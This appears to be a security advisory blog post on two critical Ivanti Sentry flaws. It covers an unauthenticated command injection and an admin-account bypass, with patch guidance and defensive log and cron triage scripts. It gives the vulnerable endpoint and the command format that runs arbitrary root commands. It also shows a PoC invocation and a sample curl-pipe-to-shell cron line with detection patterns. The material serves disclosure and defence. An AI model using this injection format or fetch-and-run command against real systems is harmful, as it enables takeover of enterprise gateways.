  • Severity: CVE-2026-10520: CVSS 10.0 (Critical) · CVE-2026-10523: CVSS 9.9 (Critical)
  • Affected: Ivanti Sentry <= 10.5.1, <= 10.6.1, <= 10.7.0 (all branches)
  • Patched: June 9, 2026 · Exploitation: No confirmed in-the-wild exploitation; public PoC released June 10, 2026 by watchTowr Labs

Introduction

Ivanti Sentry (formerly MobileIron Sentry) is an in-line gateway appliance that manages, encrypts, and secures traffic between enterprise mobile devices and back-end systems like Microsoft Exchange. It lives at the network edge with a direct path to internal infrastructure, which makes it a high-value target.

On June 9, 2026, Ivanti disclosed two critical vulnerabilities. CVE-2026-10520 is an OS Command Injection flaw (CWE-78) in Sentry’s internal configuration API, requiring zero authentication and zero user interaction. CVE-2026-10523 is an Authentication Bypass (CWE-288) that lets an unauthenticated attacker create arbitrary admin accounts. Together they give attackers two independent no-credential paths to full appliance control.

Neither affects Ivanti’s cloud or SaaS products. On-premises Sentry only.

By June 10, one day after the advisory, watchTowr Labs had published a full technical breakdown and a working public PoC. Patch now, outside your normal cycle.

Attribution note: The technical depth here comes directly from watchTowr Labs’ original writeup and Rapid7’s ETR. Researcher Bryan Lam is credited for CVE-2026-10523. We’re standing on the shoulders of people who did the hard work.


What Happened

CVE-2026-10520: The “Internal” API That Was Everyone’s API

Here’s the thing about internal APIs: they’re supposed to be internal. :/

Ivanti Sentry’s Spring Boot web application ships a controller ConfigServiceController that handles internal configuration commands under /mics. The vulnerable endpoint:

POST /mics/api/v2/sentry/mics-config/handleMessage

No authentication. No access restriction before the patch. The endpoint accepts a user-supplied message string, parses it into a command, module, xpath, and value, then routes it through a switch statement. When command equals execute, the call flows into handleExecute() and eventually executeNativeCommand(), which invokes native system-level methods via Java reflection — with the attacker-supplied XML determining what runs. No sanitisation. No validation. Root OS commands, fully attacker-controlled.

The internal command format Ivanti intended for their own use looks like this:

execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>/bin/cat /sys/devices/virtual/dmi/id/product_name</reqandres></commandexec>

Swap out the /bin/cat value for any shell command. That’s it. The reqandres field is your terminal. watchTowr confirmed the command output returns in the HTTP response body. Root. Zero credentials.

The fix hardcodes the input to a single benign command and adds Apache-level regex rules to block unauthenticated access to the entire path, essentially retrofitting the authentication that should have been there from the start.

CVE-2026-10523: The Admin Account Dispenser

Discovered by researcher Bryan Lam, CVE-2026-10523 (CVSS 9.9, CWE-288) lets a remote unauthenticated attacker create arbitrary administrative accounts and gain full admin access to the Sentry management panel. The system fails to distinguish authenticated from unauthenticated users during privileged account creation, an alternate path that had no lock on the door.

While CVE-2026-10520 is the headline, CVE-2026-10523 is a complete administrative takeover on its own. Patch both.

Exploit maturity: Public PoC available via watchTowr Labs’ GitHub as of June 10, 2026. No confirmed in-the-wild exploitation at publication; NCSC-NL flagged elevated exploitation likelihood immediately after watchTowr’s disclosure.


Why This Is Especially Dangerous

  • Sentry lives at the edge. Compromising it exposes credentials, session tokens, and directory integrations. It is a lateral movement launchpad, not just a single box.
  • Root means full persistence. Backdoors, modified startup scripts, new system users. Cleanup requires full reimaging.
  • Public PoC lowers the floor. The watchTowr script takes --url and --cmd as arguments. Advanced capability not required.
  • Two independent attack paths. CVE-2026-10520 gives OS-level root. CVE-2026-10523 gives admin panel access. Patching one without the other leaves a door open.
  • Ivanti Sentry has KEV history. CVE-2023-38035 and CVE-2020-15505 both made CISA’s Known Exploited Vulnerabilities catalog. Threat actors know this product and where it sits.

Most at risk: organisations with Sentry appliances internet-exposed or reachable from less-trusted segments, particularly government, finance, healthcare, and defence.


Affected Versions

Branch    Vulnerable Versions      Fixed Version
R10.5     10.5.1 and earlier       R10.5.2
R10.6     10.6.1 and earlier       R10.6.2
R10.7     10.7.0 and earlier       R10.7.1

Not affected: Ivanti cloud-hosted and SaaS products. On-premises only.


Mitigations

1. Patch immediately

Update to R10.5.2, R10.6.2, or R10.7.1. Both CVEs are fixed in all three releases. ISOs and update packages are at support.mobileiron.com. Ivanti asked customers to update “right away”; take that literally.

2. Restrict network access while you patch

If you need time before patching, restrict Sentry management interfaces to trusted admin networks, enforce segmentation so Sentry is not directly internet-reachable, and apply temporary edge controls. These reduce exposure but do not substitute for patching.

3. Run watchTowr’s detection script

watchTowr’s Detection Artefact Generator checks for both CVEs against your instance:

python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://[your-sentry-host] --cmd "uname -a"

Indicators of Compromise

No specific IoCs (IPs, hashes, infrastructure) have been publicly confirmed as of June 11, 2026. Use these behavioural checks:

On the device: unexpected new system users or admin accounts in /etc/passwd or the Sentry admin panel; new or modified cron jobs, systemd units, or init scripts; unexpected network listener processes; recently written executables in /tmp or /var/tmp.
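To make the on-device checks repeatable, the following is an added triage script (not from this post, Ivanti, or watchTowr) that applies the first two checks above to /etc/passwd and crontab content. The baseline account list, the sample passwd and cron text, and the scratch-directory list are constructed assumptions for the example; on a real appliance, feed it the live files and a baseline taken from a known-good image.

```python
import re
from typing import List, Tuple

# Constructed sample /etc/passwd content (not from a real appliance). The
# svc_backup entry is the kind of artefact a root-level intruder leaves behind.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
svc_backup:x:0:0::/tmp/.x:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
"""

# Constructed sample crontab content; 198.51.100.9 is a TEST-NET placeholder.
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/rotate-logs.sh
*/5 * * * * /var/tmp/.cache/update >/dev/null 2>&1
30 * * * * curl -s http://198.51.100.9/x.sh | sh
@reboot /usr/sbin/sshd -D
"""

# Accounts present on a known-good image. This set is an assumption for the
# example; derive yours from your own golden image or vendor documentation.
BASELINE_USERS = {"root", "bin", "daemon", "sshd", "apache"}

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
LOGIN_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh"}
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def check_passwd(passwd_text: str, baseline=BASELINE_USERS) -> List[Tuple[str, str]]:
    """Flag UID-0 non-root accounts, accounts outside the baseline, and
    interactive accounts whose home lives in a scratch directory."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed passwd entry"))
            continue
        name, _, uid, _, _, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account that is not root"))
        if name not in baseline:
            findings.append((name, "account not in known-good baseline"))
        if home.startswith(SCRATCH_DIRS) and shell in LOGIN_SHELLS:
            findings.append((name, f"interactive shell with home under {home}"))
    return findings


def check_cron(cron_text: str) -> List[Tuple[str, str]]:
    """Flag cron commands that run from scratch directories or pipe a download
    straight into a shell; both are common persistence patterns."""
    findings = []
    for line in cron_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        # Either "@keyword command" or five time fields followed by the command.
        parts = entry.split(None, 1 if entry.startswith("@") else 5)
        command = parts[-1]
        if any(d in command for d in SCRATCH_DIRS):
            findings.append((entry, "cron command runs from a scratch directory"))
        if DOWNLOAD_TO_SHELL.search(command):
            findings.append((entry, "cron command pipes a download into a shell"))
    return findings


def triage(passwd_text: str, cron_text: str) -> dict:
    """Bundle both checks; an empty dict of findings means nothing was flagged."""
    return {"passwd": check_passwd(passwd_text), "cron": check_cron(cron_text)}


if __name__ == "__main__":
    for section, items in triage(SAMPLE_PASSWD, SAMPLE_CRON).items():
        for subject, reason in items:
            print(f"[{section}] {subject}: {reason}")
```

Run it against the real files with `triage(open("/etc/passwd").read(), open("/etc/crontab").read())`, and extend the same pattern to /etc/cron.d, user crontabs, and systemd unit directories. An empty result is not a clean bill of health; it only means these specific artefacts are absent.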

In logs: POST requests to /mics/api/v2/sentry/mics-config/handleMessage from external IPs (this endpoint should never receive external traffic post-patch); unexpected HTTP 200 responses from that path; unexpected admin account creation events.
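The log check above is simple enough to automate. The following is an added example (not code from this post, Ivanti, or watchTowr) that classifies web-server access-log lines for POSTs to the handleMessage endpoint. It assumes an Apache combined/common log layout and a list of trusted admin networks; neither is documented on this page, so adjust both to your environment. The sample log lines are constructed, using TEST-NET addresses for the external callers.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Endpoint named in the advisory and the watchTowr writeup.
HANDLE_MESSAGE_PATH = "/mics/api/v2/sentry/mics-config/handleMessage"

# Networks from which internal callers are expected. These ranges are an
# assumption for the example; substitute your real admin/management networks.
TRUSTED_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# Apache combined/common log layout (assumed; verify against your appliance).
ACCESS_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample access log (not real traffic).
SAMPLE_ACCESS_LOG = """\
10.20.30.40 - - [11/Jun/2026:08:01:12 +0000] "GET /admin/login HTTP/1.1" 200 5123
203.0.113.7 - - [11/Jun/2026:08:02:45 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 200 412
203.0.113.7 - - [11/Jun/2026:08:03:01 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 403 199
10.20.30.41 - - [11/Jun/2026:08:05:00 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 200 88
198.51.100.9 - - [11/Jun/2026:08:06:30 +0000] "GET /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 405 0
"""


@dataclass
class Finding:
    timestamp: str
    src: str
    status: int
    severity: str
    reason: str


def is_trusted_source(ip: str) -> bool:
    """True only for addresses inside the configured admin networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # hostnames or malformed fields are never trusted
    return any(addr in net for net in TRUSTED_NETWORKS)


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for POSTs to handleMessage, None for everything else."""
    m = ACCESS_LOG_RE.match(line)
    if m is None:
        return None
    path = m["path"].split("?", 1)[0]
    if m["method"] != "POST" or path != HANDLE_MESSAGE_PATH:
        return None
    status = int(m["status"])
    src = m["src"]
    if is_trusted_source(src):
        return Finding(m["ts"], src, status, "info", "handleMessage called from a trusted network")
    if 200 <= status < 300:
        # An external caller received a success response. On an unpatched appliance
        # that is the pre-auth path described above, so treat it as probable compromise.
        return Finding(m["ts"], src, status, "critical", "external POST accepted by handleMessage")
    return Finding(m["ts"], src, status, "high", "external POST to handleMessage rejected (probe, or blocked by patch)")


def scan(lines: Iterable[str]) -> List[Finding]:
    return [f for f in map(classify, lines) if f is not None]


def worst_severity(findings: List[Finding]) -> str:
    order = {"info": 0, "high": 1, "critical": 2}
    return max((f.severity for f in findings), key=order.get, default="none")


if __name__ == "__main__":
    hits = scan(SAMPLE_ACCESS_LOG.splitlines())
    for f in hits:
        print(f"{f.severity:8} {f.timestamp} {f.src} {f.status} {f.reason}")
    print("worst:", worst_severity(hits))
```

Feed it the appliance's access log (or the same lines as forwarded to your SIEM) and escalate on any `critical` result; a `high` result still means someone was probing the path and the source is worth blocking and investigating. Because the patch blocks the path at the Apache layer, a post-patch appliance should produce only `high` or `info` findings.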

In traffic: unexpected outbound connections from the appliance to external IPs; DNS queries to unfamiliar domains; lateral movement traffic from the Sentry host to internal systems.

If you suspect compromise, treat the appliance as fully owned. Contain it, rotate all credentials that transited it (Exchange service accounts, LDAP bind credentials, MDM certificates), and restore from a known-good state.

Check the Ivanti advisory at hub.ivanti.com for updated guidance. This post will be updated if confirmed exploitation IoCs become available.


References